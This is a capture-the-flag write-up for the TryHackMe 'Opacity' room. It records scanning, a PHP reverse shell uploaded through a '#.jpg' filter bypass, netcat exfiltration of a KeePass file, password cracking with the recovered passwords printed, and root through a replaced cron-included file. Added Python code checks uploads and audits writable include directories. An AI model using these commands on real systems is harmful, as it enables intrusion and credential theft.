Opacity
Room Link: https://tryhackme.com/room/opacity
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Found this page. I tried different extensions, but it looks like it only accepts extensions that images use, such as .jpg and .png.

Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 
Kali #1
python2 -m SimpleHTTPServer 81
Kali #2
nc -lvnp 1337
Browser
http://$KALI:81/php-reverse-shell.php#.jpg
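Why the `#.jpg` suffix gets past the filter, and what a check that does not fall for it looks like. Added example, not code from the room or from this write-up: the application's own validation is not shown on this page, so `weak_is_image_url()` is an assumed reconstruction of a check that a fragment ending in `.jpg` would satisfy, and the IP in the sample URL is made up.

```python
# Added example, not code from the room or the write-up above. The application's
# own validation is not shown anywhere on this page, so weak_is_image_url() is an
# assumed reconstruction of a check that a "#.jpg" suffix would satisfy.
import posixpath
from urllib.parse import urlparse

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes of the image formats the filter claims to accept.
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


def weak_is_image_url(url: str) -> bool:
    """Assumed weak check: looks at how the raw URL string ends. A fragment
    ("#.jpg") or a query ("?x=.jpg") is part of that string, so it passes."""
    return any(url.lower().endswith(ext) for ext in ALLOWED_EXT)


def strict_is_image_url(url: str) -> bool:
    """Parse first: the fragment is never sent to the server and the query is
    not part of the resource name, so only the path's extension counts."""
    path = urlparse(url).path
    return posixpath.splitext(path)[1].lower() in ALLOWED_EXT


def sniff_image_type(data: bytes):
    """Extension implied by the file's first bytes, or None if it is not an
    image we recognise (a PHP source file starts with '<?php', not a magic)."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def accept_upload(url: str, data: bytes) -> bool:
    """Accept only when the URL path and the fetched bytes agree it's an image.
    The caller should still store the file under a server-generated name."""
    return strict_is_image_url(url) and sniff_image_type(data) is not None


if __name__ == "__main__":
    # Constructed sample: the write-up's bypass URL shape, with the IP made up.
    bypass = "http://192.0.2.10:81/php-reverse-shell.php#.jpg"
    print("weak  :", weak_is_image_url(bypass))    # True  (bypassed)
    print("strict:", strict_is_image_url(bypass))  # False
```

The extension check on its own is still not enough: the fetched bytes should be sniffed as well, the file should be stored under a name the server chooses, and the upload directory should not be one where the web server executes scripts.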


Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Transfer file
In /opt we find a KeePass file, so I transferred it back to Kali to try to crack it.

Kali(receiving)
nc -l -p 1234 > dataset.kdbx
Victim(sending)
nc -w 3 $KALI 1234 < dataset.kdbx
Crack KeePass
Kali
/opt/john/keepass2john dataset.kdbx > johnkeepass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt 
Kali
keepassx dataset.kdbx
Password: 741852963
TCP/22 - SSH
Kali
ssh sysadmin@$VICTIM
Password: Cl0udP4ss40p4city#8700
PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32

The script calls backup.inc.php in the lib folder. We can't edit this file, but we can delete it and replace it, so I copied the same PHP reverse shell script that was used before and replaced backup.inc.php with it. After that I just waited until the script ran on its own.
Kali #1
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
rm -f backup.inc.php
wget http://10.10.215.36:81/php-reverse-shell.php
cp php-reverse-shell.php backup.inc.php
Kali #2
nc -lvnp 1337
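The condition used above is a scheduled script including a file that a low-privileged user cannot edit but can delete and recreate, because the directory holding it is writable. An audit for that condition, added here as an example and not the room's or the write-up's code: it reads a PHP script's literal include/require targets and reports whether each one is writable, lives in a writable directory, or is missing. The directory layout in `build_fixture()` is constructed for the demonstration; the room's real paths are not reproduced beyond the file name backup.inc.php.

```python
# Added example, not the room's or the write-up's code. It checks a scheduled
# script's include/require targets for the condition exploited above: a file a
# low-privileged user cannot edit but can delete and recreate because the
# directory holding it is writable. Paths in build_fixture() are constructed.
import os
import re
import stat
import tempfile

# Static include/require targets written as a string literal (simplification:
# computed paths and include_path lookups are not followed).
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")

OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def included_files(script_path):
    """Resolve each literal include target relative to the script's directory."""
    base = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        targets = INCLUDE_RE.findall(fh.read())
    return [os.path.normpath(os.path.join(base, t)) for t in targets]


def replace_risk(path):
    """Ways a non-owner could make the included code theirs:
    file-writable : the file itself is group/world writable (edit in place)
    dir-writable  : parent directory is group/world writable without the sticky
                    bit, so the file can be deleted and recreated
    missing       : target does not exist, so whoever can write the directory
                    gets to create it"""
    reasons = []
    if os.path.exists(path):
        if os.stat(path).st_mode & OTHER_WRITE:
            reasons.append("file-writable")
    else:
        reasons.append("missing")
    parent = os.path.dirname(path)
    if os.path.isdir(parent):
        mode = os.stat(parent).st_mode
        if mode & OTHER_WRITE and not mode & stat.S_ISVTX:
            reasons.append("dir-writable")
    return reasons


def audit_script(script_path):
    """Map every include target to its list of risk reasons ([] = fine)."""
    return {p: replace_risk(p) for p in included_files(script_path)}


def build_fixture():
    """Constructed layout: scripts/backup.php includes one helper from a
    world-writable lib/ (the room's situation) and one from a sane directory."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="include-audit-"))
    lib, safe_lib, scripts = (os.path.join(root, d)
                              for d in ("lib", "safelib", "scripts"))
    for d in (lib, safe_lib, scripts):
        os.makedirs(d)
    weak = os.path.join(lib, "backup.inc.php")
    safe = os.path.join(safe_lib, "config.inc.php")
    for f in (weak, safe):
        with open(f, "w") as fh:
            fh.write("<?php // helper\n")
        os.chmod(f, 0o644)          # the file itself is not editable by others
    os.chmod(lib, 0o777)            # ...but its directory is: delete + recreate works
    os.chmod(safe_lib, 0o755)
    script = os.path.join(scripts, "backup.php")
    with open(script, "w") as fh:
        fh.write("<?php\ninclude('../lib/backup.inc.php');\n"
                 "require_once \"../safelib/config.inc.php\";\n")
    return {"script": script, "weak": weak, "safe": safe}


if __name__ == "__main__":
    fx = build_fixture()
    for target, reasons in audit_script(fx["script"]).items():
        print(target, "->", reasons or "ok")
```

The fix the audit points at is ownership and mode on the directory, not only on the file: code that a privileged scheduled job includes should sit in a directory owned by root (or the job's user) with mode 755 or tighter, and the job should not run with more privilege than the task needs.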